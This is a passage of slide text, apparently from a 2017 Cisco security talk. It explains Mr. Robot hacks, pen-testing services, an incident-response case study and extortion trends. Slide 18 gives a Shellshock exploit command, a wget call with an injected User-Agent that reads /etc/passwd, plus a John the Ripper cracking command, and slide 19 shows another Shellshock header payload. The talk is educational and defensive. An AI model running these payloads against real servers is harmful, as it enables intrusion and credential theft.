  • 16. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How’d He Do It? 3. Spoof the MAC Address of the Keyboard 4. Link Bluetooth Device to the Cop’s Laptop 5. Hack the Prison
  • 17. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Elliot Hacks Tyrell’s Email Account
  • 18. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How’d He Do It? wget –U “() test;];echo ”Content-type: text/plain”; echo; echo; /bin/cat /etc/passwd” http://evilcorp-intl.com/login.email.srf?wa=wsignin1.0&rpsnv=4d 1. Exploit Shellshock vulnerability using wget 2. Use John the Ripper on /etc/passwd (Elliot should have used /etc/shadow) ./john /etc/passwd
  • 19. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Simple Attack That Works GET / HTTP/1.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8,fr;q=0.6 Cache-Control: no-cache Pragma: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 Host: example.com Edit “User-Agent” Header to look like “HTTP_USER_AGENT=() { :; }; /bin/eject”
  • 20. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Darlene Phishes Evil Corp
  • 21. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Phishing Website Proof of Concept 1. Start Up The Social Engineer Toolkit (SET)
  • 22. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Phishing Website Proof of Concept 2. Choose Attack Method
  • 23. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Phishing Website Proof of Concept 3. Configure Attacker’s Website and Kali Box
  • 24. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Phishing Website Proof of Concept 3. Configure Website and Kali Box (continued)
  • 25. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Phishing Website Proof of Concept 4. Create Website and Start Server
  • 26. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Phishing Website Proof of Concept 5. Victim Visits Phishing Site
  • 27. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Phishing Website Proof of Concept 6. Victim Is Owned
  • 28. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Cisco Consultants Use These Tools and Techniques Application & Penetration Team Services • External Network Penetration Test  Exploit software vulnerabilities such as Shellshock • Internal Network Penetration Test  Use post-exploitation tools like “Mimikatz” and “John the Ripper” to compromise authentication credentials • IoT Security Assessment Manipulate IoT protocols like BACnet using a Raspberry Pi • Social Engineering Assessment  Launch phishing attacks using tools like the Social Engineer Toolkit (SET)
  • 29. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Penetration Testing Methodology
  • 30. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Cisco Incident Response Goes To Hollywood
  • 31. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Security Advisory Services  Incident Response  Security Strategy and Architecture  Compliance  Privacy and Risk Management  Security Assessments and Penetration  Network and Infrastructure  Application and System  Physical Benefits  Higher confidence in what is actually happening in your network, including greater visibility and deeper understanding of your operations and infrastructure  Identify security gaps, ineffective operational processes and poorly designed technology security controls
  • 32. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Cisco Incident Response Services A Holistic Portfolio for Your Organizations Needs Proactive Threat Hunting Am I currently compromised? Emergency Incident Response I need help right now. IR Tabletop Exercises I need to know we will respond correctly. Incident Response Retainers I want to know I have a team standing by. IR Plans & Playbooks Am I missing anything needed to respond? Included in IR Retainers IR Readiness Assessments I need a plan for when an incident occurs.
  • 33. 300+ Full Time Threat Intel Researchers 1100+ Threat Traps Threat Intel 1.5 Million Daily Malware Samples 600 Billion Daily Email Messages 16 Billion Daily Web Requests Honeypots Open Source Communities Vulnerability Discovery (Internal) Product Telemetry Internet-Wide Scanning Customer Data Sharing Programs Service Provider Coordination Program Open Source Intel Sharing 3rd Party Programs (MAPP) Industry Sharing Partnerships (ISACs) Intel Breakdown 20 Billion Threats Blocked Intel Sharing 500+ Participants Millions Of Telemetry Agents 4 Global Data Centers 100+ Threat Intelligence Partners
  • 34. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Malware outbreaks Top things we are seeing 1 2 3 4 Data Exfiltration Ransomware Insiders
  • 35. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Nyetya: Helping Customers Respond Quickly Immediate Access to named Responders Urgent Notification with unpublished details IR onsite in Ukraine working with Talos Threat Researchers Quick Access to Incident Responders and Intelligence Emergency Customers Emergency Bulletin Source M.E. Doc Retainer Customers
  • 36. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Kill Chain (KC) “Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains”, Lockheed Martin bit.ly/killchain KC1- Reconnaissance: Collecting information about the target organization KC2- Weaponization: Packaging the threat for delivery KC3- Delivery: Transmission of the weaponized payload KC4- Exploitation: Exploiting vulnerabilities on a system KC5- Installation: Installing malware on a target KC6- Command & Control: Providing “hands on the keyboard” access to the target system KC7- Actions on Intent: The attacker achieves their objective (e.g. stealing information) Recon Weapon- ization Delivery Exploitation Installation C2 Actions on Intent
  • 37. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential CUSTOMER CASE STUDY Organization’s testing/development network environment targeted, which lacked security controls and monitoring. Attackers maintained persistence in the environment for 5+ months. C2 malware with zero A/V detection rate, which was utilized for persistence into environment. Deployed StealthWatch into existing infrastructure. Deployed AMP for Endpoints to facilitate endpoint, network analysis, and remediation. Malware reverse engineering, memory forensics, & disk forensics performed on affected hosts. App Pen Testing group conducted application hardening post-incident response. ResponseIncident Telecommunications Escalated to Cisco IR after law enforcement notification Targeted attack by nation state actor. Intelligence Outcomes Cisco StealthWatch deployment provided enhanced visibility into infrastructure, which identified additional security gaps. Umbrella Investigate utilized for monitoring primary C2 server. Cisco provided SME’s to assist in response efforts to identify, contain, and eradicate the malware. Cisco utilized proven hunt methodologies and techniques for an advanced adversary in a large environment, while performing forensic methodologies for root cause analysis. People Process Technology Revenue : $3B+ Employees: 100k+
  • 38. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Dynamic Threats Objective Example Skill Potential Data Targets Named Actors State Sponsored/APT Economic, Political Advantage, Destruction Intellectual Property Theft, DDOS Very High Intellectual Property, Negotiation, National Intelligence APT1, Energetic Bear Cyber Crime Financial Gain Credit Card Theft High Credit Card Data, Personal Identifiable Information, Health Records Russian Business Network (RBN) Hacktivism Defamation, Destruction, Press & Policy Website Defacements, DDOS Low - Med Access to the Network, Compromising Information Syrian Electronic Army, LizardSquad, Anonymous Nuisance Access & Propagation Botnets & Spam Low Sensitive Information, Vulnerable Data General Malware Revenge, Destruction, Monetary Gain Insiders Destruction, Theft Med Intellectual Property, Compromising Information Jimmy, Suzy, Sally, Johnny
  • 39. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Anatomy of the Attack • Collecting information about the organization • Port Scan (e.g. Nmap) • Network Logon from Local Administrator Account Reconnaissance Internet Gb Router ISP Cable Modem Win10 Hyper V
  • 40. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Anatomy of the Attack Typically, we don’t see KC2; however malware analysis of “C2malware.exe” provided some insight into payload/ capabilities. Weaponization 00-00-00-AA-AB-AB | 192.168.1.1 | HostName | Administrator | C2Domain.com | AcmeIncResearch Internet Gb Router ISP Cable Modem Win10 Hyper V
  • 41. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Anatomy of the Attack • Network Logon from Administrator Account • No password required • Transmission of C2malware.exe • Attacker(s) choice • No Firewall • No A/V Delivery Internet Gb Router ISP Cable Modem Win10 Hyper V
  • 42. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Anatomy of the Attack • Exploitation? None required • No firewall • No password required Exploitation Internet Gb Router ISP Cable Modem Win10 Hyper V
  • 43. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Anatomy of the Attack • Install C2malware.exe on target machine Installation 01/01/2017 00:02:00 UTC C:Windowssystem32C2malware.exe 01/01/2017 00:00:30 UTC C:UsersAttackerC2malware.exe Internet Gb Router ISP Cable Modem Win10 Hyper V
  • 44. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Anatomy of the Attack • C:Windowssystem32C2malwa re.exe • Persistence via Run Key • Beacons out over port 80 to C2 node Command and Control (C2)
  • 45. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Anatomy of the Attack • Remote backdoor via C2malware.exe with the following capabilities: • Remote Shell • Read/Write/Execute File(s) • Create Tasks • List Drives Actions on Objectives Internet Gb Router ISP Cable Modem Win10 Hyper V
  • 46. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential The practice of obtaining something, especially money, through force or threats Extortion Defined
  • 47. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Attribution was simpler
  • 48. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential First forays into e-extortion • 2007 FBI release of warning about online extortion mirroring mafia tactics
  • 49. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Lizard Squad Gaming DDoS
  • 50. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential DDOS “Protection” Racket
  • 51. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Armada Collective DHS Warning
  • 52. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Copy Cat Profiteering
  • 53. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Data Breach Response Phishing Scammers leveraged breaches of adult-themed websites to scare victims into ransom payments
  • 54. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Ransomware http://www.welivesecurity.com/2017/01/05/killdisk- now-targeting-linux-demands-250k-ransom-cant- decrypt/ http://blog.talosintel.com/2016/07/ranscam.html
  • 55. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Doxware • First started seeing this over a year ago • Becoming more mainstream • New frontier of ransomware • Data Exfiltration • Encryption of Data • Extortion • Data leakage
  • 56. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public Resources Cisco Incident Response Team If you are currently experiencing an incident, please contact us at: 1-844-831-7715 Or email IncidentResponse@cisco.com Cisco Security Services: https://cisco.com/go/securityservices Blogs: https://blogs.cisco.com
  • 57. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential “I drink and I hack things” – T. Lannister